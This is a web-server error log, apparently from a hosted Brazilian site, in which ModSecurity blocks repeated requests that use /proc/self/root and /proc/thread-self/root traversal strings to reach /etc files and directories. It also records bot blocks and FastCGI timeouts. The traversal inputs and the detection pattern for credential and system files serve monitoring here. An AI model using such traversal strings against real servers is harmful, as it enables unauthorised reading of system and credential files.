[Tue Mar 17 22:14:18.724556 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.228.61:36834] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn8atY0UrI5A3LftIwt0gAAAY0"]
[Tue Mar 17 22:14:27.875664 2026] [:error] [pid 18211:tid 140411641214720] [client 74.7.243.128:53932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8cxcIZFNFgEhGGCRGHAAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:14:40.137824 2026] [proxy_fcgi:error] [pid 17972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:14:43.156365 2026] [mime_magic:error] [pid 17972:tid 140411741927168] (70014)End of file found: [client 74.7.241.31:45104] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/cache/man/id
[Tue Mar 17 22:14:46.899609 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.243.128:46292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8hoh-PF_25v4hFRCaQAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:14:51.088499 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:55662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8i9Y0UrI5A3LftIwt5AAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:15:02.361365 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:15:13.589278 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:60178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8oew_le52K8_3pV17yAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:15:24.134220 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45208] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:15:27.071285 2026] [core:alert] [pid 19507:tid 140411616036608] [client 74.7.243.128:59022] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib
[Tue Mar 17 22:15:37.574284 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:47076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8ucdf6f5d65gmYZRucAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:15:46.141830 2026] [proxy_fcgi:error] [pid 18211:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45810] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:15:53.618732 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:45114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8yda6ubjKNq_cu4Y1KgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:15:55.748120 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:54892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8y-yqAr6etmhZHNpV2wAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:16:08.145815 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:16:13.183335 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:54908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn83cdf6f5d65gmYZRuiAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:16:31.129811 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:16:54.133796 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:16:57.749829 2026] [core:alert] [pid 26799:tid 140411582465792] [client 74.7.241.31:38124] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/tuned
[Tue Mar 17 22:17:16.161798 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:17:38.161785 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48922] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:17:41.054306 2026] [mime_magic:error] [pid 17887:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:57386] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Tue Mar 17 22:17:41.054430 2026] [access_compat:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:57386] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Tue Mar 17 22:18:01.145789 2026] [proxy_fcgi:error] [pid 19507:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:18:24.145782 2026] [proxy_fcgi:error] [pid 11816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:18:30.747131 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:34450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn9Zuw_le52K8_3pV18EgAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:18:33.283494 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:51620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn9aQkwaGbbGflqUZCzFAAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:18:34.418472 2026] [:error] [pid 14206:tid 140411616036608] [client 74.7.244.43:48024] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn9aumGQQJ-Dl0Hqn5FWAAAAA8"]
[Tue Mar 17 22:18:45.135844 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50786] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:19:06.149851 2026] [proxy_fcgi:error] [pid 17972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:19:22.249054 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.228.61:38634] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn9mgkwaGbbGflqUZCzJwAAANc"]
[Tue Mar 17 22:19:28.125834 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:19:51.149813 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:20:12.129804 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:20:35.128670 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53648] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:20:58.145839 2026] [proxy_fcgi:error] [pid 17972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:21:02.055055 2026] [core:alert] [pid 2598:tid 140411557287680] [client 74.7.243.128:44328] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/libexec
[Tue Mar 17 22:21:20.298825 2026] [proxy_fcgi:error] [pid 2598:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:21:42.193801 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55376] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:21:59.150122 2026] [:error] [pid 17972:tid 140411557287680] [client 74.7.241.31:51630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-N4Z5-GlpYjVrXCrlgQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:22:04.154681 2026] [proxy_fcgi:error] [pid 18211:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:22:10.199428 2026] [:error] [pid 18211:tid 140411708356352] [client 74.7.243.128:38500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-QhcIZFNFgEhGGCRG-wAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:22:15.807627 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.241.31:59282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-RymAPhZkrhU8w4kQ_gAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:22:27.149800 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:22:45.252077 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:57580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-ZeyqAr6etmhZHNpWdwAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:22:47.319361 2026] [:error] [pid 18211:tid 140411574073088] [client 74.7.241.31:54314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-ZxcIZFNFgEhGGCRHBgAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:22:51.225809 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:22:51.439721 2026] [:error] [pid 14206:tid 140411565680384] [client 74.7.241.31:54330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-a-mGQQJ-Dl0Hqn5GHgAAABU"], referer: 